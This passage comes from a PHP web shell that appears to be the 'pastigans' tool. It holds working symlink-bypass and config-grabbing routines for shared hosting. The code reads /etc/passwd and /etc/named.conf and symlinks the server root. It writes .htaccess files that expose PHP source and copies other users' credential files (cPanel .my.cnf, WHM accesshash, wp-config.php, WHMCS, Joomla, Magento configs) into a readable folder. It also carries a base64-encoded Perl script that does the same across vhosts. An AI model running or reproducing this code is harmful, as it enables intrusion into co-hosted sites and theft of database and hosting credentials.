859 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
860 while(!feof($file)){
861 $s = fgets($file);
862 $matches = array();
863 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
864 $matches = str_replace("home/","",$matches[1]);
865 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
866 continue;
867 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
868 <td align=center><font class=txt>" . $matches . "</td>";
869 echo "<td align=center><font class=txt><a href=/pastiganteng_sym1/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
870 $dcount++;}fclose($file);
871 echo "</table>";}else{if($os != "Windows"){@mkdir("pastiganteng_sym1",0777);@chdir("pastiganteng_sym1");@exe("ln -s / root");$file3 = 'Options all
872 DirectoryIndex Sux.html
873 AddType text/plain .php
874 AddHandler server-parsed .php
875 AddType text/plain .html
876 AddHandler txt .html
877 Require None
878 Satisfy Any';
879 $fp3 = fopen('.htaccess','w');
880 $fw3 = fwrite($fp3,$file3);@fclose($fp3);
881 echo "<br><br><center><h2>-=Symlink Server=-</h2></center><br><br><center>
882 <div class='mybox'><h2>server symlinker</h2>
883 <table align=center border=1><tr>
884 <td align=center><font size=4>ID</font></td>
885 <td align=center><font size=4>Users</font></td>
886 <td align=center><font size=4>Symlink</font></td></tr>";
887 $temp = "";$val1 = 0;$val2 = 1000;
888 for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
889 if ($uid)$temp .= join(':',$uid)."\n";}
890 echo '<br/>';$temp = trim($temp);$file5 =
891 fopen("test.txt","w");
892 fputs($file5,$temp);
893 fclose($file5);$dcount = 1;$file =
894 fopen("test.txt", "r") or exit("Unable to open file!");
895 while(!feof($file)){$s = fgets($file);$matches = array();
896 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
897 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
898 continue;
899 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
900 <td align=center><font class=txt>" . $matches . "</td>";
901 echo "<td align=center><font class=txt><a href=/pastiganteng_sym1/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
902 $dcount++;}
903 fclose($file);
904 echo "</table></div></center>";unlink("test.txt");
905 } else
906 echo "<center><font size=4>Cannot create Symlink</font></center>";
907 }
908 }
909
910} elseif($_GET['do'] == 'symlink2') {
911$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
912$d0mains = @file("/etc/named.conf");
913##httaces
914if($d0mains){
915@mkdir("pastigans_sym",0777);
916@chdir("pastigans_sym");
917@exe("ln -s / root");
918$file3 = 'Options Indexes FollowSymLinks
919DirectoryIndex pastigans.htm
920AddType text/plain .php
921AddHandler text/plain .php
922Satisfy Any';
923$fp3 = fopen('.htaccess','w');
924$fw3 = fwrite($fp3,$file3);@fclose($fp3);
925echo "
926<table align=center border=1 style='width:60%;border-color:#333333;'>
927<tr>
928<td align=center><font size=2>S. No.</font></td>
929<td align=center><font size=2>Domains</font></td>
930<td align=center><font size=2>Users</font></td>
931<td align=center><font size=2>Symlink</font></td>
932</tr>";
933$dcount = 1;
934foreach($d0mains as $d0main){
935if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
936flush();
937if(strlen(trim($domains[1][0])) > 2){
938$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
939echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
940<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
941<td>".$user['name']."</td>
942<td><a href='$full/pastigans_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
943flush();
944$dcount++;}}}
945echo "</table>";
946}else{
947$TEST=@file('/etc/passwd');
948if ($TEST){
949@mkdir("pastigans_sym",0777);
950@chdir("pastigans_sym");
951exe("ln -s / root");
952$file3 = 'Options Indexes FollowSymLinks
953DirectoryIndex pastigans.htm
954AddType text/plain .php
955AddHandler text/plain .php
956Satisfy Any';
957 $fp3 = fopen('.htaccess','w');
958 $fw3 = fwrite($fp3,$file3);
959 @fclose($fp3);
960 echo "
961 <table align=center border=1><tr>
962 <td align=center><font size=3>S. No.</font></td>
963 <td align=center><font size=3>Users</font></td>
964 <td align=center><font size=3>Symlink</font></td></tr>";
965 $dcount = 1;
966 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
967 while(!feof($file)){
968 $s = fgets($file);
969 $matches = array();
970 $t = preg_match('//(.*?)://s', $s, $matches);
971 $matches = str_replace("home/","",$matches[1]);
972 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
973 continue;
974 echo "<tr><td align=center><font size=2>" . $dcount . "</td>
975 <td align=center><font class=txt>" . $matches . "</td>";
976 echo "<td align=center><font class=txt><a href=$full/pastigans_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
977 $dcount++;}fclose($file);
978 echo "</table>";}else{if($os != "Windows"){@mkdir("pastigans_sym",0777);@chdir("pastigans_sym");@exe("ln -s / root");$file3 = '
979 Options Indexes FollowSymLinks
980DirectoryIndex pastigans.htm
981AddType text/plain .php
982AddHandler text/plain .php
983Satisfy Any
984';
985 $fp3 = fopen('.htaccess','w');
986 $fw3 = fwrite($fp3,$file3);@fclose($fp3);
987 echo "
988 <div class='mybox'><h2>server symlinker</h2>
989 <table align=center border=1><tr>
990 <td align=center><font size=3>ID</font></td>
991 <td align=center><font size=3>Users</font></td>
992 <td align=center><font size=3>Symlink</font></td></tr>";
993 $temp = "";$val1 = 0;$val2 = 1000;
994 for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
995 if ($uid)$temp .= join(':',$uid)."n";}
996 echo '<br/>';$temp = trim($temp);$file5 =
997 fopen("test.txt","w");
998 fputs($file5,$temp);
999 fclose($file5);$dcount = 1;$file =
1000 fopen("test.txt", "r") or exit("Unable to open file!");
1001 while(!feof($file)){$s = fgets($file);$matches = array();
1002 $t = preg_match('//(.*?)://s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
1003 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1004 continue;
1005 echo "<tr><td align=center><font size=2>" . $dcount . "</td>
1006 <td align=center><font class=txt>" . $matches . "</td>";
1007 echo "<td align=center><font class=txt><a href=$full/pastigans_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1008 $dcount++;}
1009 fclose($file);
1010 echo "</table></div></center>";unlink("test.txt");
1011 } else
1012 echo "<center><font size=3>Cannot create Symlink</font></center>";
1013 }
1014 }
1015
1016
1017} elseif($_GET['do'] == 'vhost') {
1018 echo "<form method='POST' action=''>";
1019 echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
1020 echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
1021 if (isset($_POST['Colii'])){ system('ln -s / pastigans.txt');
1022 $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
1023 $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","pastigans.txt");
1024 $rt="<br><a href=pastigans.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
1025 Bypassed Successfully</b></font></a>";
1026 echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";} echo "</form>";
1027} elseif($_GET['do'] == 'config') {
1028 $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
1029 $idx = mkdir("pastigans_config", 0777);
1030 $isi_htc = "Options allnRequire NonenSatisfy Any";
1031 $htc = fopen("pastigans_config/.htaccess","w");
1032 fwrite($htc, $isi_htc);
1033 while($passwd = fgets($etc)) {
1034 if($passwd == "" || !$etc) {
1035 echo "<font color=red>Can't read /etc/passwd</font>";
1036 } else {
1037 preg_match_all('/(.*?):x:/', $passwd, $user_config);
1038 foreach($user_config[1] as $user_pastigans) {
1039 $user_config_dir = "/home/$user_pastigans/public_html/";
1040 if(is_readable($user_config_dir)) {
1041 $grab_config = array(
1042 "/home/$user_pastigans/.my.cnf" => "cpanel",
1043 "/home/$user_pastigans/.accesshash" => "WHM-accesshash",
1044 "/home/$user_pastigans/public_html/vdo_config.php" => "Voodoo",
1045 "/home/$user_pastigans/public_html/bw-configs/config.ini" => "BosWeb",
1046 "/home/$user_pastigans/public_html/config/koneksi.php" => "Lokomedia",
1047 "/home/$user_pastigans/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1048 "/home/$user_pastigans/public_html/clientarea/configuration.php" => "WHMCS",
1049 "/home/$user_pastigans/public_html/whm/configuration.php" => "WHMCS",
1050 "/home/$user_pastigans/public_html/whmcs/configuration.php" => "WHMCS",
1051 "/home/$user_pastigans/public_html/forum/config.php" => "phpBB",
1052 "/home/$user_pastigans/public_html/sites/default/settings.php" => "Drupal",
1053 "/home/$user_pastigans/public_html/config/settings.inc.php" => "PrestaShop",
1054 "/home/$user_pastigans/public_html/app/etc/local.xml" => "Magento",
1055 "/home/$user_pastigans/public_html/joomla/configuration.php" => "Joomla",
1056 "/home/$user_pastigans/public_html/configuration.php" => "Joomla",
1057 "/home/$user_pastigans/public_html/wp/wp-config.php" => "WordPress",
1058 "/home/$user_pastigans/public_html/wordpress/wp-config.php" => "WordPress",
1059 "/home/$user_pastigans/public_html/wp-config.php" => "WordPress",
1060 "/home/$user_pastigans/public_html/admin/config.php" => "OpenCart",
1061 "/home/$user_pastigans/public_html/slconfig.php" => "Sitelok",
1062 "/home/$user_pastigans/public_html/application/config/database.php" => "Ellislab");
1063 foreach($grab_config as $config => $nama_config) {
1064 $ambil_config = file_get_contents($config);
1065 if($ambil_config == '') {
1066 } else {
1067 $file_config = fopen("pastigans_config/$user_pastigans-$nama_config.txt","w");
1068 fputs($file_config,$ambil_config);
1069 }
1070 }
1071 }
1072 }
1073 }
1074 }
1075 echo "<center><a href='?dir=$dir/pastigans_config'><font color=blue>Done</font></a></center>";
1076
1077} elseif($_GET['do'] == 'config') {
1078 $idx = mkdir("pastigans_config", 0777);
1079 $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
1080 $htc = fopen("pastigans_config/.htaccess","w");
1081 fwrite($htc, $isi_htc);
1082 fclose($htc);
1083 if(preg_match("/vhosts|vhost/", $dir)) {
1084 $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1085 $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3